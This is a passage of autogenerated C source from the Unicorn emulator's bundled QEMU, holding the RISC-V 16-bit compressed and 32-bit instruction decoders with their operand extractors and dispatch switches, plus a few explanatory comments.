........ ........ .001.... .1110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:125 */ decode_insn32_extract_csr(ctx, &u.f_decode_insn329, insn); if (trans_csrrw(ctx, &u.f_decode_insn329)) return true; return false; case 0x2: /* ........ ........ .010.... .1110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:126 */ decode_insn32_extract_csr(ctx, &u.f_decode_insn329, insn); if (trans_csrrs(ctx, &u.f_decode_insn329)) return true; return false; case 0x3: /* ........ ........ .011.... .1110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:127 */ decode_insn32_extract_csr(ctx, &u.f_decode_insn329, insn); if (trans_csrrc(ctx, &u.f_decode_insn329)) return true; return false; case 0x5: /* ........ ........ .101.... .1110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:128 */ decode_insn32_extract_csr(ctx, &u.f_decode_insn329, insn); if (trans_csrrwi(ctx, &u.f_decode_insn329)) return true; return false; case 0x6: /* ........ ........ .110.... .1110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:129 */ decode_insn32_extract_csr(ctx, &u.f_decode_insn329, insn); if (trans_csrrsi(ctx, &u.f_decode_insn329)) return true; return false; case 0x7: /* ........ ........ .111.... 
.1110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:130 */ decode_insn32_extract_csr(ctx, &u.f_decode_insn329, insn); if (trans_csrrci(ctx, &u.f_decode_insn329)) return true; return false; } return false; } return false; }
unicorn-2.1.1/qemu/target/riscv/riscv64/
unicorn-2.1.1/qemu/target/riscv/riscv64/decode_insn16.inc.c
/* This file is autogenerated by scripts/decodetree.py. */ #ifdef CONFIG_PRAGMA_DIAGNOSTIC_AVAILABLE # pragma GCC diagnostic push # pragma GCC diagnostic ignored "-Wredundant-decls" # ifdef __clang__ # pragma GCC diagnostic ignored "-Wtypedef-redefinition" # endif #endif typedef arg_empty arg_illegal; static bool trans_illegal(DisasContext *ctx, arg_illegal *a); typedef arg_i arg_addi; static bool trans_addi(DisasContext *ctx, arg_addi *a); typedef arg_i arg_fld; static bool trans_fld(DisasContext *ctx, arg_fld *a); typedef arg_i arg_lw; static bool trans_lw(DisasContext *ctx, arg_lw *a); typedef arg_s arg_fsd; static bool trans_fsd(DisasContext *ctx, arg_fsd *a); typedef arg_s arg_sw; static bool trans_sw(DisasContext *ctx, arg_sw *a); typedef arg_u arg_lui; static bool trans_lui(DisasContext *ctx, arg_lui *a); typedef arg_shift arg_srli; static bool trans_srli(DisasContext *ctx, arg_srli *a); typedef arg_shift arg_srai; static bool trans_srai(DisasContext *ctx, arg_srai *a); typedef arg_i arg_andi; static bool trans_andi(DisasContext *ctx, arg_andi *a); typedef arg_r arg_sub; static bool trans_sub(DisasContext *ctx, arg_sub *a); typedef arg_r arg_xor; static bool trans_xor(DisasContext *ctx, arg_xor *a); typedef arg_r arg_or; static bool trans_or(DisasContext *ctx, arg_or *a); typedef arg_r arg_and; static bool trans_and(DisasContext *ctx, arg_and *a); typedef arg_j arg_jal; static bool trans_jal(DisasContext *ctx, arg_jal *a); typedef arg_b arg_beq; static bool trans_beq(DisasContext *ctx, arg_beq *a); typedef arg_b arg_bne; static bool trans_bne(DisasContext *ctx, arg_bne *a); typedef arg_shift arg_slli; static bool trans_slli(DisasContext *ctx, arg_slli *a); typedef arg_i arg_jalr; static bool trans_jalr(DisasContext *ctx, arg_jalr *a); typedef arg_empty arg_ebreak; static bool trans_ebreak(DisasContext *ctx, arg_ebreak *a); typedef arg_r arg_add; static bool trans_add(DisasContext *ctx, arg_add *a); typedef arg_i 
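/*
 * How to read this generated decoder: scripts/decodetree.py turns the
 * insn16.decode / insn16-64.decode pattern files into (a) one
 * "arg_<name>" typedef per instruction, aliasing the shared per-format
 * argument struct (arg_i, arg_r, arg_b, ...), (b) a trans_<name>()
 * prototype that the hand-written translator code must implement, and
 * (c) the decode_insn16() switch below, which extracts the operand
 * fields and dispatches to those handlers.  The caller in translate.c
 * selects this 16-bit decoder when the two low opcode bits are not 11
 * (the RISC-V marker for a compressed RVC encoding) and decode_insn32()
 * otherwise.  Note how RVC instructions reuse the 32-bit handlers:
 * c.mv, for instance, goes through decode_insn16_extract_c_mv(), which
 * forces imm = 0 and then calls trans_addi(), so no separate compressed
 * semantics are needed.
 */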
arg_ld; static bool trans_ld(DisasContext *ctx, arg_ld *a); typedef arg_s arg_sd; static bool trans_sd(DisasContext *ctx, arg_sd *a); typedef arg_i arg_addiw; static bool trans_addiw(DisasContext *ctx, arg_addiw *a); typedef arg_r arg_subw; static bool trans_subw(DisasContext *ctx, arg_subw *a); typedef arg_r arg_addw; static bool trans_addw(DisasContext *ctx, arg_addw *a); #ifdef CONFIG_PRAGMA_DIAGNOSTIC_AVAILABLE # pragma GCC diagnostic pop #endif static void decode_insn16_extract_c_addi16sp(DisasContext *ctx, arg_i *a, uint16_t insn) { a->imm = ex_shift_4(ctx, deposit32(deposit32(deposit32(deposit32(extract32(insn, 6, 1), 1, 31, extract32(insn, 2, 1)), 2, 30, extract32(insn, 5, 1)), 3, 29, extract32(insn, 3, 2)), 5, 27, sextract32(insn, 12, 1))); a->rs1 = 2; a->rd = 2; } static void decode_insn16_extract_c_addi4spn(DisasContext *ctx, arg_i *a, uint16_t insn) { a->imm = ex_shift_2(ctx, deposit32(deposit32(deposit32(extract32(insn, 6, 1), 1, 31, extract32(insn, 5, 1)), 2, 30, extract32(insn, 11, 2)), 4, 28, extract32(insn, 7, 4))); a->rs1 = 2; a->rd = ex_rvc_register(ctx, extract32(insn, 2, 3)); } static void decode_insn16_extract_c_andi(DisasContext *ctx, arg_i *a, uint16_t insn) { a->imm = deposit32(extract32(insn, 2, 5), 5, 27, sextract32(insn, 12, 1)); a->rs1 = ex_rvc_register(ctx, extract32(insn, 7, 3)); a->rd = ex_rvc_register(ctx, extract32(insn, 7, 3)); } static void decode_insn16_extract_c_jalr(DisasContext *ctx, arg_i *a, uint16_t insn) { a->imm = 0; a->rs1 = extract32(insn, 7, 5); } static void decode_insn16_extract_c_ldsp(DisasContext *ctx, arg_i *a, uint16_t insn) { a->imm = ex_shift_3(ctx, deposit32(deposit32(extract32(insn, 5, 2), 2, 30, extract32(insn, 12, 1)), 3, 29, extract32(insn, 2, 3))); a->rs1 = 2; a->rd = extract32(insn, 7, 5); } static void decode_insn16_extract_c_li(DisasContext *ctx, arg_i *a, uint16_t insn) { a->imm = deposit32(extract32(insn, 2, 5), 5, 27, sextract32(insn, 12, 1)); a->rs1 = 0; a->rd = extract32(insn, 7, 5); } static void decode_insn16_extract_c_lui(DisasContext *ctx, arg_u *a, uint16_t insn) { a->imm = ex_shift_12(ctx, deposit32(extract32(insn, 2, 5), 5, 27, sextract32(insn, 12, 1))); a->rd = extract32(insn, 7, 5); } static void decode_insn16_extract_c_lwsp(DisasContext *ctx, arg_i *a, uint16_t insn) { a->imm = ex_shift_2(ctx, deposit32(deposit32(extract32(insn, 4, 3), 3, 29, extract32(insn, 12, 1)), 4, 28, extract32(insn, 2, 2))); a->rs1 = 2; a->rd = extract32(insn, 7, 5); } static void decode_insn16_extract_c_mv(DisasContext *ctx, arg_i *a, uint16_t insn) { a->imm = 0; a->rs1 = extract32(insn, 2, 5); a->rd = extract32(insn, 7, 5); } static void decode_insn16_extract_c_sdsp(DisasContext *ctx, arg_s *a, uint16_t insn) { a->imm = ex_shift_3(ctx, deposit32(extract32(insn, 10, 3), 3, 29, extract32(insn, 7, 3))); a->rs1 = 2; a->rs2 = extract32(insn, 2, 5); } static void decode_insn16_extract_c_shift(DisasContext *ctx, arg_shift *a, uint16_t insn) { a->rd = ex_rvc_register(ctx, extract32(insn, 7, 3)); a->rs1 = ex_rvc_register(ctx, extract32(insn, 7, 3)); a->shamt = ex_rvc_shifti(ctx, deposit32(extract32(insn, 2, 5), 5, 27, extract32(insn, 12, 1))); } static void decode_insn16_extract_c_shift2(DisasContext *ctx, arg_shift *a, uint16_t insn) { a->rd = extract32(insn, 7, 5); a->rs1 = extract32(insn, 7, 5); a->shamt = ex_rvc_shifti(ctx, deposit32(extract32(insn, 2, 5), 5, 27, extract32(insn, 12, 1))); } static void decode_insn16_extract_c_swsp(DisasContext *ctx, arg_s *a, uint16_t insn) { a->imm = ex_shift_2(ctx, deposit32(extract32(insn, 9, 4), 4, 28, 
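/*
 * (The helpers used throughout these extractors come from QEMU's
 * bitops.h and translate.c: extract32(v, s, n) reads the n-bit field of
 * v starting at bit s, sextract32() is its sign-extending variant,
 * deposit32(base, s, n, f) writes f into bits [s, s+n) of base, and the
 * ex_shift_N() callbacks scale the assembled value by 1 << N.  A worked
 * example for this very extractor, c.swsp: given insn = 0xC23A, i.e.
 * "c.swsp x14, 4(sp)", extract32(insn, 9, 4) picks up offset[5:2] = 1,
 * the enclosing deposit32() merges offset[7:6] = 0 into bits 5:4, and
 * ex_shift_2() scales the result to the byte offset 4.)
 */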
extract32(insn, 7, 2))); a->rs1 = 2; a->rs2 = extract32(insn, 2, 5); } static void decode_insn16_extract_cb_z(DisasContext *ctx, arg_b *a, uint16_t insn) { a->imm = ex_shift_1(ctx, deposit32(deposit32(deposit32(deposit32(extract32(insn, 3, 2), 2, 30, extract32(insn, 10, 2)), 4, 28, extract32(insn, 2, 1)), 5, 27, extract32(insn, 5, 2)), 7, 25, sextract32(insn, 12, 1))); a->rs1 = ex_rvc_register(ctx, extract32(insn, 7, 3)); a->rs2 = 0; } static void decode_insn16_extract_ci(DisasContext *ctx, arg_i *a, uint16_t insn) { a->imm = deposit32(extract32(insn, 2, 5), 5, 27, sextract32(insn, 12, 1)); a->rs1 = extract32(insn, 7, 5); a->rd = extract32(insn, 7, 5); } static void decode_insn16_extract_cj(DisasContext *ctx, arg_j *a, uint16_t insn) { a->imm = ex_shift_1(ctx, deposit32(deposit32(deposit32(deposit32(deposit32(deposit32(deposit32(extract32(insn, 3, 3), 3, 29, extract32(insn, 11, 1)), 4, 28, extract32(insn, 2, 1)), 5, 27, extract32(insn, 7, 1)), 6, 26, extract32(insn, 6, 1)), 7, 25, extract32(insn, 9, 2)), 9, 23, extract32(insn, 8, 1)), 10, 22, sextract32(insn, 12, 1))); } static void decode_insn16_extract_cl_d(DisasContext *ctx, arg_i *a, uint16_t insn) { a->imm = ex_shift_3(ctx, deposit32(extract32(insn, 10, 3), 3, 29, extract32(insn, 5, 2))); a->rs1 = ex_rvc_register(ctx, extract32(insn, 7, 3)); a->rd = ex_rvc_register(ctx, extract32(insn, 2, 3)); } static void decode_insn16_extract_cl_w(DisasContext *ctx, arg_i *a, uint16_t insn) { a->imm = ex_shift_2(ctx, deposit32(deposit32(extract32(insn, 6, 1), 1, 31, extract32(insn, 10, 3)), 4, 28, extract32(insn, 5, 1))); a->rs1 = ex_rvc_register(ctx, extract32(insn, 7, 3)); a->rd = ex_rvc_register(ctx, extract32(insn, 2, 3)); } static void decode_insn16_extract_cr(DisasContext *ctx, arg_r *a, uint16_t insn) { a->rs2 = extract32(insn, 2, 5); a->rs1 = extract32(insn, 7, 5); a->rd = extract32(insn, 7, 5); } static void decode_insn16_extract_cs_2(DisasContext *ctx, arg_r *a, uint16_t insn) { a->rs2 = ex_rvc_register(ctx, extract32(insn, 2, 3)); a->rs1 = ex_rvc_register(ctx, extract32(insn, 7, 3)); a->rd = ex_rvc_register(ctx, extract32(insn, 7, 3)); } static void decode_insn16_extract_cs_d(DisasContext *ctx, arg_s *a, uint16_t insn) { a->imm = ex_shift_3(ctx, deposit32(extract32(insn, 10, 3), 3, 29, extract32(insn, 5, 2))); a->rs1 = ex_rvc_register(ctx, extract32(insn, 7, 3)); a->rs2 = ex_rvc_register(ctx, extract32(insn, 2, 3)); } static void decode_insn16_extract_cs_w(DisasContext *ctx, arg_s *a, uint16_t insn) { a->imm = ex_shift_2(ctx, deposit32(deposit32(extract32(insn, 6, 1), 1, 31, extract32(insn, 10, 3)), 4, 28, extract32(insn, 5, 1))); a->rs1 = ex_rvc_register(ctx, extract32(insn, 7, 3)); a->rs2 = ex_rvc_register(ctx, extract32(insn, 2, 3)); } static void decode_insn16_extract_decode_insn16_Fmt_22(DisasContext *ctx, arg_empty *a, uint16_t insn) { } static bool decode_insn16(DisasContext *ctx, uint16_t insn) { union { arg_b f_b; arg_empty f_empty; arg_i f_i; arg_j f_j; arg_r f_r; arg_s f_s; arg_shift f_shift; arg_u f_u; } u; switch (insn & 0x0000e003) { case 0x00000000: /* 000..... 
......00 */ if ((insn & 0x00001fe0) == 0x00000000) { /* 00000000 000...00 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:87 */ decode_insn16_extract_decode_insn16_Fmt_22(ctx, &u.f_empty, insn); ctx->invalid = true; if (trans_illegal(ctx, &u.f_empty)) return true; } /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:88 */ decode_insn16_extract_c_addi4spn(ctx, &u.f_i, insn); if (trans_addi(ctx, &u.f_i)) return true; return false; case 0x00000001: /* 000..... ......01 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:96 */ decode_insn16_extract_ci(ctx, &u.f_i, insn); if (trans_addi(ctx, &u.f_i)) return true; return false; case 0x00000002: /* 000..... ......10 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:115 */ decode_insn16_extract_c_shift2(ctx, &u.f_shift, insn); if (trans_slli(ctx, &u.f_shift)) return true; return false; case 0x00002000: /* 001..... ......00 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:90 */ decode_insn16_extract_cl_d(ctx, &u.f_i, insn); if (trans_fld(ctx, &u.f_i)) return true; return false; case 0x00002001: /* 001..... ......01 */ if ((insn & 0x00000f80) == 0x00000000) { /* 001.0000 0.....01 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16-64.decode:25 */ decode_insn16_extract_decode_insn16_Fmt_22(ctx, &u.f_empty, insn); if (trans_illegal(ctx, &u.f_empty)) return true; } /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16-64.decode:26 */ decode_insn16_extract_ci(ctx, &u.f_i, insn); if (trans_addiw(ctx, &u.f_i)) return true; return false; case 0x00002002: /* 001..... ......10 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:116 */ decode_insn16_extract_c_ldsp(ctx, &u.f_i, insn); if (trans_fld(ctx, &u.f_i)) return true; return false; case 0x00004000: /* 010..... ......00 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:91 */ decode_insn16_extract_cl_w(ctx, &u.f_i, insn); if (trans_lw(ctx, &u.f_i)) return true; return false; case 0x00004001: /* 010..... ......01 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:97 */ decode_insn16_extract_c_li(ctx, &u.f_i, insn); if (trans_addi(ctx, &u.f_i)) return true; return false; case 0x00004002: /* 010..... ......10 */ if ((insn & 0x00000f80) == 0x00000000) { /* 010.0000 0.....10 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:118 */ decode_insn16_extract_decode_insn16_Fmt_22(ctx, &u.f_empty, insn); if (trans_illegal(ctx, &u.f_empty)) return true; } /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:119 */ decode_insn16_extract_c_lwsp(ctx, &u.f_i, insn); if (trans_lw(ctx, &u.f_i)) return true; return false; case 0x00006000: /* 011..... ......00 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16-64.decode:20 */ decode_insn16_extract_cl_d(ctx, &u.f_i, insn); if (trans_ld(ctx, &u.f_i)) return true; return false; case 0x00006001: /* 011..... ......01 */ if ((insn & 0x0000107c) == 0x00000000) { /* 0110.... 
.0000001 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:99 */ decode_insn16_extract_decode_insn16_Fmt_22(ctx, &u.f_empty, insn); if (trans_illegal(ctx, &u.f_empty)) return true; } if ((insn & 0x00000f80) == 0x00000100) { /* 011.0001 0.....01 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:100 */ decode_insn16_extract_c_addi16sp(ctx, &u.f_i, insn); if (trans_addi(ctx, &u.f_i)) return true; } /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:101 */ decode_insn16_extract_c_lui(ctx, &u.f_u, insn); if (trans_lui(ctx, &u.f_u)) return true; return false; case 0x00006002: /* 011..... ......10 */ if ((insn & 0x00000f80) == 0x00000000) { /* 011.0000 0.....10 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16-64.decode:33 */ decode_insn16_extract_decode_insn16_Fmt_22(ctx, &u.f_empty, insn); if (trans_illegal(ctx, &u.f_empty)) return true; } /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16-64.decode:34 */ decode_insn16_extract_c_ldsp(ctx, &u.f_i, insn); if (trans_ld(ctx, &u.f_i)) return true; return false; case 0x00008001: /* 100..... ......01 */ switch ((insn >> 10) & 0x3) { case 0x0: /* 100.00.. ......01 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:103 */ decode_insn16_extract_c_shift(ctx, &u.f_shift, insn); if (trans_srli(ctx, &u.f_shift)) return true; return false; case 0x1: /* 100.01.. ......01 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:104 */ decode_insn16_extract_c_shift(ctx, &u.f_shift, insn); if (trans_srai(ctx, &u.f_shift)) return true; return false; case 0x2: /* 100.10.. ......01 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:105 */ decode_insn16_extract_c_andi(ctx, &u.f_i, insn); if (trans_andi(ctx, &u.f_i)) return true; return false; case 0x3: /* 100.11.. ......01 */ decode_insn16_extract_cs_2(ctx, &u.f_r, insn); switch (insn & 0x00001060) { case 0x00000000: /* 100011.. .00...01 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:106 */ if (trans_sub(ctx, &u.f_r)) return true; return false; case 0x00000020: /* 100011.. .01...01 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:107 */ if (trans_xor(ctx, &u.f_r)) return true; return false; case 0x00000040: /* 100011.. .10...01 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:108 */ if (trans_or(ctx, &u.f_r)) return true; return false; case 0x00000060: /* 100011.. .11...01 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:109 */ if (trans_and(ctx, &u.f_r)) return true; return false; case 0x00001000: /* 100111.. .00...01 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16-64.decode:28 */ if (trans_subw(ctx, &u.f_r)) return true; return false; case 0x00001020: /* 100111.. .01...01 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16-64.decode:29 */ if (trans_addw(ctx, &u.f_r)) return true; return false; } return false; } return false; case 0x00008002: /* 100..... ......10 */ switch ((insn >> 12) & 0x1) { case 0x0: /* 1000.... ......10 */ if ((insn & 0x00000ffc) == 0x00000000) { /* 10000000 00000010 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:122 */ decode_insn16_extract_decode_insn16_Fmt_22(ctx, &u.f_empty, insn); if (trans_illegal(ctx, &u.f_empty)) return true; } if ((insn & 0x0000007c) == 0x00000000) { /* 1000.... 
.0000010 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:123 */ decode_insn16_extract_c_jalr(ctx, &u.f_i, insn); u.f_i.rd = 0; if (trans_jalr(ctx, &u.f_i)) return true; } /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:124 */ decode_insn16_extract_c_mv(ctx, &u.f_i, insn); if (trans_addi(ctx, &u.f_i)) return true; return false; case 0x1: /* 1001.... ......10 */ if ((insn & 0x00000ffc) == 0x00000000) { /* 10010000 00000010 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:127 */ decode_insn16_extract_decode_insn16_Fmt_22(ctx, &u.f_empty, insn); if (trans_ebreak(ctx, &u.f_empty)) return true; } if ((insn & 0x0000007c) == 0x00000000) { /* 1001.... .0000010 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:128 */ decode_insn16_extract_c_jalr(ctx, &u.f_i, insn); u.f_i.rd = 1; if (trans_jalr(ctx, &u.f_i)) return true; } /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:129 */ decode_insn16_extract_cr(ctx, &u.f_r, insn); if (trans_add(ctx, &u.f_r)) return true; return false; } return false; case 0x0000a000: /* 101..... ......00 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:92 */ decode_insn16_extract_cs_d(ctx, &u.f_s, insn); if (trans_fsd(ctx, &u.f_s)) return true; return false; case 0x0000a001: /* 101..... ......01 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:110 */ decode_insn16_extract_cj(ctx, &u.f_j, insn); u.f_j.rd = 0; if (trans_jal(ctx, &u.f_j)) return true; return false; case 0x0000a002: /* 101..... ......10 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:131 */ decode_insn16_extract_c_sdsp(ctx, &u.f_s, insn); if (trans_fsd(ctx, &u.f_s)) return true; return false; case 0x0000c000: /* 110..... ......00 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:93 */ decode_insn16_extract_cs_w(ctx, &u.f_s, insn); if (trans_sw(ctx, &u.f_s)) return true; return false; case 0x0000c001: /* 110..... ......01 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:111 */ decode_insn16_extract_cb_z(ctx, &u.f_b, insn); if (trans_beq(ctx, &u.f_b)) return true; return false; case 0x0000c002: /* 110..... ......10 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:132 */ decode_insn16_extract_c_swsp(ctx, &u.f_s, insn); if (trans_sw(ctx, &u.f_s)) return true; return false; case 0x0000e000: /* 111..... ......00 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16-64.decode:21 */ decode_insn16_extract_cs_d(ctx, &u.f_s, insn); if (trans_sd(ctx, &u.f_s)) return true; return false; case 0x0000e001: /* 111..... ......01 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:112 */ decode_insn16_extract_cb_z(ctx, &u.f_b, insn); if (trans_bne(ctx, &u.f_b)) return true; return false; case 0x0000e002: /* 111..... 
......10 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16-64.decode:36 */ decode_insn16_extract_c_sdsp(ctx, &u.f_s, insn); if (trans_sd(ctx, &u.f_s)) return true; return false; } return false; }
unicorn-2.1.1/qemu/target/riscv/riscv64/decode_insn32.inc.c
/* This file is autogenerated by scripts/decodetree.py. */ typedef struct { int aq; int rd; int rl; int rs1; int rs2; } arg_atomic; typedef struct { int imm; int rs1; int rs2; } arg_b; typedef struct { int rd; int rm; int rs1; int rs2; int rs3; } arg_decode_insn3210; typedef struct { int rd; int rm; int rs1; int rs2; } arg_decode_insn3211; typedef struct { int rd; int rm; int rs1; } arg_decode_insn3212; typedef struct { int rd; int rs1; } arg_decode_insn3213; typedef struct { int rs1; int rs2; } arg_decode_insn3214; typedef struct { int rs1; } arg_decode_insn3215; typedef struct { int pred; int succ; } arg_decode_insn3216; typedef struct { int csr; int rd; int rs1; } arg_decode_insn329; typedef struct { #ifdef _MSC_VER int dummy; // MSVC does not allow empty struct #endif } arg_empty; typedef struct { int imm; int rd; int rs1; } arg_i; typedef struct { int imm; int rd; } arg_j; typedef struct { int rd; int rs1; int rs2; } arg_r; typedef struct { int imm; int rs1; int rs2; } arg_s; typedef struct { int rd; int rs1; int shamt; } arg_shift; typedef struct { int imm; int rd; } arg_u; typedef arg_empty arg_ecall; static bool trans_ecall(DisasContext *ctx, arg_ecall *a); typedef arg_empty arg_ebreak; static bool trans_ebreak(DisasContext *ctx, arg_ebreak *a); typedef arg_empty arg_uret; static bool trans_uret(DisasContext *ctx, arg_uret *a); typedef arg_empty arg_sret; static bool trans_sret(DisasContext *ctx, arg_sret *a); typedef arg_empty arg_mret; static bool trans_mret(DisasContext *ctx, arg_mret *a); typedef arg_empty arg_wfi; static bool trans_wfi(DisasContext *ctx, arg_wfi *a); typedef arg_decode_insn3214 arg_hfence_gvma; static bool trans_hfence_gvma(DisasContext *ctx, arg_hfence_gvma *a); typedef arg_decode_insn3214 arg_hfence_bvma; static bool trans_hfence_bvma(DisasContext *ctx, arg_hfence_bvma *a); typedef arg_decode_insn3214 arg_sfence_vma; static bool trans_sfence_vma(DisasContext *ctx, arg_sfence_vma *a); typedef arg_decode_insn3215 arg_sfence_vm; static bool trans_sfence_vm(DisasContext *ctx, arg_sfence_vm *a); typedef arg_u arg_lui; static bool trans_lui(DisasContext *ctx, arg_lui *a); typedef arg_u arg_auipc; static bool trans_auipc(DisasContext *ctx, arg_auipc *a); typedef arg_j arg_jal; static bool trans_jal(DisasContext *ctx, arg_jal *a); typedef arg_i arg_jalr; static bool trans_jalr(DisasContext *ctx, arg_jalr *a); typedef arg_b arg_beq; static bool trans_beq(DisasContext *ctx, arg_beq *a); typedef arg_b arg_bne; static bool trans_bne(DisasContext *ctx, arg_bne *a); typedef arg_b arg_blt; static bool trans_blt(DisasContext *ctx, arg_blt *a); typedef arg_b arg_bge; static bool trans_bge(DisasContext *ctx, arg_bge *a); typedef arg_b arg_bltu; static bool trans_bltu(DisasContext *ctx, 
arg_bltu *a); typedef arg_b arg_bgeu; static bool trans_bgeu(DisasContext *ctx, arg_bgeu *a); typedef arg_i arg_lb; static bool trans_lb(DisasContext *ctx, arg_lb *a); typedef arg_i arg_lh; static bool trans_lh(DisasContext *ctx, arg_lh *a); typedef arg_i arg_lw; static bool trans_lw(DisasContext *ctx, arg_lw *a); typedef arg_i arg_lbu; static bool trans_lbu(DisasContext *ctx, arg_lbu *a); typedef arg_i arg_lhu; static bool trans_lhu(DisasContext *ctx, arg_lhu *a); typedef arg_s arg_sb; static bool trans_sb(DisasContext *ctx, arg_sb *a); typedef arg_s arg_sh; static bool trans_sh(DisasContext *ctx, arg_sh *a); typedef arg_s arg_sw; static bool trans_sw(DisasContext *ctx, arg_sw *a); typedef arg_i arg_addi; static bool trans_addi(DisasContext *ctx, arg_addi *a); typedef arg_i arg_slti; static bool trans_slti(DisasContext *ctx, arg_slti *a); typedef arg_i arg_sltiu; static bool trans_sltiu(DisasContext *ctx, arg_sltiu *a); typedef arg_i arg_xori; static bool trans_xori(DisasContext *ctx, arg_xori *a); typedef arg_i arg_ori; static bool trans_ori(DisasContext *ctx, arg_ori *a); typedef arg_i arg_andi; static bool trans_andi(DisasContext *ctx, arg_andi *a); typedef arg_shift arg_slli; static bool trans_slli(DisasContext *ctx, arg_slli *a); typedef arg_shift arg_srli; static bool trans_srli(DisasContext *ctx, arg_srli *a); typedef arg_shift arg_srai; static bool trans_srai(DisasContext *ctx, arg_srai *a); typedef arg_r arg_add; static bool trans_add(DisasContext *ctx, arg_add *a); typedef arg_r arg_sub; static bool trans_sub(DisasContext *ctx, arg_sub *a); typedef arg_r arg_sll; static bool trans_sll(DisasContext *ctx, arg_sll *a); typedef arg_r arg_slt; static bool trans_slt(DisasContext *ctx, arg_slt *a); typedef arg_r arg_sltu; static bool trans_sltu(DisasContext *ctx, arg_sltu *a); typedef arg_r arg_xor; static bool trans_xor(DisasContext *ctx, arg_xor *a); typedef arg_r arg_srl; static bool trans_srl(DisasContext *ctx, arg_srl *a); typedef arg_r arg_sra; static bool trans_sra(DisasContext *ctx, arg_sra *a); typedef arg_r arg_or; static bool trans_or(DisasContext *ctx, arg_or *a); typedef arg_r arg_and; static bool trans_and(DisasContext *ctx, arg_and *a); typedef arg_decode_insn3216 arg_fence; static bool trans_fence(DisasContext *ctx, arg_fence *a); typedef arg_empty arg_fence_i; static bool trans_fence_i(DisasContext *ctx, arg_fence_i *a); typedef arg_decode_insn329 arg_csrrw; static bool trans_csrrw(DisasContext *ctx, arg_csrrw *a); typedef arg_decode_insn329 arg_csrrs; static bool trans_csrrs(DisasContext *ctx, arg_csrrs *a); typedef arg_decode_insn329 arg_csrrc; static bool trans_csrrc(DisasContext *ctx, arg_csrrc *a); typedef arg_decode_insn329 arg_csrrwi; static bool trans_csrrwi(DisasContext *ctx, arg_csrrwi *a); typedef arg_decode_insn329 arg_csrrsi; static bool trans_csrrsi(DisasContext *ctx, arg_csrrsi *a); typedef arg_decode_insn329 arg_csrrci; static bool trans_csrrci(DisasContext *ctx, arg_csrrci *a); typedef arg_r arg_mul; static bool trans_mul(DisasContext *ctx, arg_mul *a); typedef arg_r arg_mulh; static bool trans_mulh(DisasContext *ctx, arg_mulh *a); typedef arg_r arg_mulhsu; static bool trans_mulhsu(DisasContext *ctx, arg_mulhsu *a); typedef arg_r arg_mulhu; static bool trans_mulhu(DisasContext *ctx, arg_mulhu *a); typedef arg_r arg_div; static bool trans_div(DisasContext *ctx, arg_div *a); typedef arg_r arg_divu; static bool trans_divu(DisasContext *ctx, arg_divu *a); typedef arg_r arg_rem; static bool trans_rem(DisasContext *ctx, arg_rem *a); typedef arg_r arg_remu; 
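/*
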